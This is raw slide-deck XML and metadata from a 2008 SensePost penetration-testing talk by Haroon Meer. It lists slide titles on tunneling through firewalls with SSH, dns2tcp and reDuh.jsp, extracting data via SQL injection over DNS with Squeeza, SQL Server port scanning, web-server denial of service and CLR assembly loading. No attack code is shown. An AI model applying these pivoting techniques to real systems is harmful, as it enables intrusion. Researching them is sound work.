          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="631031" y="1766669"/>
            <a:ext cx="1168400" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="L-Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1132680" y="1731744"/>
            <a:ext cx="6324600" cy="621683"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst>
              <a:gd name="adj1" fmla="val 47276"/>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Proxied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> connection from Local Machine to Target port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-20998" y="2303084"/>
            <a:ext cx="865980" cy="600164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Now listens on port 55555</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1"/>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animBg="1"/>
      <p:bldP spid="21" grpId="1" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="1"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2562</TotalTime>
  <Words>4744</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>566</Paragraphs>
  <Slides>80</Slides>
  <Notes>3</Notes>
  <HiddenSlides>10</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Design Template</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>80</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="81" baseType="lpstr">
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Pushing a Camel through the eye of the Needle!</vt:lpstr>
      <vt:lpstr>About:us</vt:lpstr>
      <vt:lpstr>A progression of Attacks</vt:lpstr>
      <vt:lpstr>History (Continued.)</vt:lpstr>
      <vt:lpstr>History (Continued.)</vt:lpstr>
      <vt:lpstr>Remote Exec (with feeling!)</vt:lpstr>
      <vt:lpstr>Time to pivot™</vt:lpstr>
      <vt:lpstr>SSH Tunnels (a)</vt:lpstr>
      <vt:lpstr>SSH Tunnels (b)</vt:lpstr>
      <vt:lpstr>SSH Tunnels (b)</vt:lpstr>
      <vt:lpstr>Interlude (dns2tcp)</vt:lpstr>
      <vt:lpstr>ssh tunnels over dns2tcp</vt:lpstr>
      <vt:lpstr>Layer 2 bridges</vt:lpstr>
      <vt:lpstr>Slide 14</vt:lpstr>
      <vt:lpstr>Layer 2 bridges</vt:lpstr>
      <vt:lpstr>A Brief Recap</vt:lpstr>
      <vt:lpstr>Introducing glenn.jsp (working title)</vt:lpstr>
      <vt:lpstr>Demo.</vt:lpstr>
      <vt:lpstr>Picture it..</vt:lpstr>
      <vt:lpstr>Slide 20</vt:lpstr>
      <vt:lpstr>Startup Proxy / Startup JSP</vt:lpstr>
      <vt:lpstr>RDP Client to localproxy</vt:lpstr>
      <vt:lpstr>Localproxy &lt;-&gt; Base64 &lt;-&gt; JSP</vt:lpstr>
      <vt:lpstr>Localproxy &lt;-&gt; Base64 &lt;-&gt; JSP &lt;-&gt; RDP</vt:lpstr>
      <vt:lpstr>ReDuh.jsp</vt:lpstr>
      <vt:lpstr>What this means..</vt:lpstr>
      <vt:lpstr>Squeeza</vt:lpstr>
      <vt:lpstr>Squeeza</vt:lpstr>
      <vt:lpstr>Squeeza process overview</vt:lpstr>
      <vt:lpstr>Squeeza: DNS</vt:lpstr>
      <vt:lpstr>Slide 31</vt:lpstr>
      <vt:lpstr>squeeza demo</vt:lpstr>
      <vt:lpstr>Squeeza: timing</vt:lpstr>
      <vt:lpstr>Profiling SQL servers</vt:lpstr>
      <vt:lpstr>This OLE’ thing</vt:lpstr>
      <vt:lpstr>Growing OLE’ together</vt:lpstr>
      <vt:lpstr>Something OLE’, something new</vt:lpstr>
      <vt:lpstr>SQL port scanner</vt:lpstr>
      <vt:lpstr>probeip(ip, port)</vt:lpstr>
      <vt:lpstr>Putting it together</vt:lpstr>
      <vt:lpstr>So what does that give us?</vt:lpstr>
      <vt:lpstr>What’s going to trip us up?</vt:lpstr>
      <vt:lpstr>Squeezing OLE juice</vt:lpstr>
      <vt:lpstr>OLE dog, new tricks</vt:lpstr>
      <vt:lpstr>SQL2005 – Pen Tester Nightmare?</vt:lpstr>
      <vt:lpstr>Huh???</vt:lpstr>
      <vt:lpstr>Fundamental problems with ‘05</vt:lpstr>
      <vt:lpstr>The 2 Big Problems</vt:lpstr>
      <vt:lpstr>The 2 Big Problems</vt:lpstr>
      <vt:lpstr>InBand Signaling++ (sp_configure)</vt:lpstr>
      <vt:lpstr>sp_configure; RECONFIGURE</vt:lpstr>
      <vt:lpstr>SQL2005 – Some new features</vt:lpstr>
      <vt:lpstr>Native XML Integration</vt:lpstr>
      <vt:lpstr>Web-Server DoS</vt:lpstr>
      <vt:lpstr>Demo: Web-Server DoS</vt:lpstr>
      <vt:lpstr>But surely this needs privs?</vt:lpstr>
      <vt:lpstr>SA == DoS on every IIS Instance ?</vt:lpstr>
      <vt:lpstr>Demo: endpoints for fun and profit</vt:lpstr>
      <vt:lpstr>Slide 59</vt:lpstr>
      <vt:lpstr>X-Platform Query Managers</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Slide 62</vt:lpstr>
      <vt:lpstr>New: CLR Integration</vt:lpstr>
      <vt:lpstr>New: CLR Integration</vt:lpstr>
      <vt:lpstr>Loading .net Assemblies (csc)</vt:lpstr>
      <vt:lpstr>Loading .net Assemblies (csc)</vt:lpstr>
      <vt:lpstr>Loading .net Assemblies (UNC)</vt:lpstr>
      <vt:lpstr>Slide 68</vt:lpstr>
      <vt:lpstr>Slide 69</vt:lpstr>
      <vt:lpstr>Loading .net Assemblies (UNC)</vt:lpstr>
      <vt:lpstr>Loading .net Assemblies (0x1618..)</vt:lpstr>
      <vt:lpstr>Assemblies and Security Privs.</vt:lpstr>
      <vt:lpstr>Demo – SPSock.exe</vt:lpstr>
      <vt:lpstr>What can we do with this?</vt:lpstr>
      <vt:lpstr>Slide 75</vt:lpstr>
      <vt:lpstr>Squeeza &lt;-&gt; .db</vt:lpstr>
      <vt:lpstr>Insert CLR-serVUH</vt:lpstr>
      <vt:lpstr>reDuh&lt;-&gt;Squueza&lt;-&gt;DNS&lt;-&gt;SQL&lt;-&gt;CLR&lt;-&gt;serVUH&lt;-&gt;RDP</vt:lpstr>
      <vt:lpstr>*.jsp/*.php/*.asp will be posted on: http://www.sensepost.com/blog/  Questions ?</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>SensePost</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Pushing a Camel through the eye of the Needle!</dc:title>
  <dc:creator>haroon meer</dc:creator>
  <cp:lastModifiedBy>haroon meer</cp:lastModifiedBy>
  <cp:revision>97</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-08-18T22:34:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-08-18T22:35:50Z</dcterms:modified>
</cp:coreProperties>
</file>